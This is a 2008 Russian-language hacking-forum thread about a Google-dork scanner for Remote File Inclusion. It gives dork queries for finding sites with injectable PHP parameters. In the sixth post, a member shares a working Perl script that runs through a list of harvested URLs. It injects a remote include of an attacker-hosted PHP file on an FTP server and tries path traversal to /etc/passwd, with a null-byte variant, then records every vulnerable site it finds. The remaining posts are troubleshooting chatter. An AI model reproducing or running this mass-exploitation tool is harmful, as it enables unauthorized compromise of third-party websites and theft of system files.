ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Google Remote File Inclusion Scanner
  #1  
Старый 04.10.2008, 10:41
Аватар для mailbrush
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию Google Remote File Inclusion Scanner


Как пользоваться:

Заливаем скрипт на сервак и запускаем.

1.Variable: Здесь Вы должны ввести переменную которую вы хотите искать
Например : page= , pag= , q= , a= , n= и тд.
2. Google page: тут предлагаю писать 0, это даст возможность посмотреть результатов.
3. Search string: сюда мы пишем только запросы ввиде allinurl:".php?a=" .htm заменить на .php?a=

Скачать:

(c) secnull
 
Ответить с цитированием

  #2  
Старый 04.10.2008, 10:49
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

писал подобную херь на перле, где то на винте валяется, только под icq.com, а не гугл
 
Ответить с цитированием

  #3  
Старый 04.10.2008, 18:59
Аватар для nonamez
nonamez
Познавший АНТИЧАТ
Регистрация: 22.07.2007
Сообщений: 1,291
Провел на форуме:
3884427

Репутация: 766


Отправить сообщение для nonamez с помощью ICQ
По умолчанию

Народ,объясните нубу,что за хрень и с чем кушать(типо инклуды через гугл ищет или на самом гугле?)
 
Ответить с цитированием

  #4  
Старый 04.10.2008, 19:08
Аватар для ruzzer
ruzzer
Познающий
Регистрация: 29.07.2007
Сообщений: 44
Провел на форуме:
532652

Репутация: 28
Отправить сообщение для ruzzer с помощью ICQ
По умолчанию

Цитата:
Сообщение от nonamez  
Народ,объясните нубу,что за хрень и с чем кушать(типо инклуды через гугл ищет или на самом гугле?)
Как я понял, для поиска сайтов, с возможной уязвимотью php-inj. Тоже самое можно сделать просто поиском в гугле, запросом
allinurl:".php?page="
 
Ответить с цитированием

  #5  
Старый 25.10.2008, 12:39
Аватар для satana8920
satana8920
Moderator - Level 7
Регистрация: 22.09.2006
Сообщений: 531
Провел на форуме:
3818187

Репутация: 369


Отправить сообщение для satana8920 с помощью ICQ
По умолчанию

может конечно глупый вопрос но тулза чекает инклуды после нахождения большой базы
Спайдер
давай выкладывай свой супер мего скриптег =) хочеться глянуть возможно даже в ЛС
 
Ответить с цитированием

  #6  
Старый 26.10.2008, 23:14
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

satana8920, оказалось что не совсем то же самое, вобщем вот код

Код:
#!perl
use LWP
$list = ""; # Путь к файлу с сылками
$res = ""; # Путь к сохранению результата
$rshell = 'ftp://omfg0o:spyder@ftp.narod.ru/antichat.php?.html'; # Удалённый инклуд, поменять на своё значение
$lshell = '/../../../../../../../../../../../../../../../../../../../../etc/passwd'; # Локальный инклуд
$timeout = 15;
$var = "$ARGV[0]";
open (LIST, "$list") or die $!;
open (RES, ">$res") or die $!;
while (<LIST>) {
	$_=~ /$var/;
	$url = "$`"."$var"."="."$rshell";
	print "Now checking : $url\n";
	$agent = LWP::UserAgent->new();
	$agent -> timeout($timeout);
	$req = HTTP::Request->new(GET => $url);
	$resp = $agent->request($req);
	$body = $resp->content;
	
	if ($body =~ m/ANTICHAT/) {
		print RES "$url\n";
	}
	$url = "$`"."$var"."="."$lshell";
	print "Now checking : $url\n";
	$req = HTTP::Request->new(GET => $url);
	$resp = $agent->request($req);
	$body = $resp->content;
	
	if ($body =~ m/root:x:0:0/) {
		print RES "$url\n";
	} else {
	$url = "$`"."$var"."="."$lshell".'%00';
	print "Now checking : $url\n";
	$req = HTTP::Request->new(GET => $url);
	$resp = $agent->request($req);
	$body = $resp->content;
	
	if ($body =~ m/root:x:0:0/) {
		print RES "$url\n";
	}
	}
}
Вобщем это чекер локальных и удалённых инклудов, работает он с файлом ссылок. Получить этот файл ссылок можно каким нить гугл грабером или моей тузлой для icq.com
https://forum.antichat.ru/thread56927.html

работоспособность этих двух скриптов не гарантирую, если чё пиши в пм =)
 
Ответить с цитированием

  #7  
Старый 26.10.2008, 23:54
Аватар для satana8920
satana8920
Moderator - Level 7
Регистрация: 22.09.2006
Сообщений: 531
Провел на форуме:
3818187

Репутация: 369


Отправить сообщение для satana8920 с помощью ICQ
По умолчанию

посмотри 9ю строчку че то у мну не пашет
говорит с 9ой строкой что то
 
Ответить с цитированием

  #8  
Старый 27.10.2008, 00:10
Аватар для Vandam
Vandam
Banned
Регистрация: 03.08.2008
Сообщений: 28
Провел на форуме:
328250

Репутация: 124
По умолчанию

Цитата:
Сообщение от satana8920  
посмотри 9ю строчку че то у мну не пашет
говорит с 9ой строкой что то
тоже самое(((
 
Ответить с цитированием

  #9  
Старый 27.10.2008, 00:16
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

код почитайте

$list = ""; # Путь к файлу с сылками
$res = ""; # Путь к сохранению результата
 
Ответить с цитированием

  #10  
Старый 27.10.2008, 00:19
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

и вообще почитайте мой пост
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Инструмент - Google! (обзор) S|\/|eliyK()T Статьи 21 26.05.2008 21:09



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ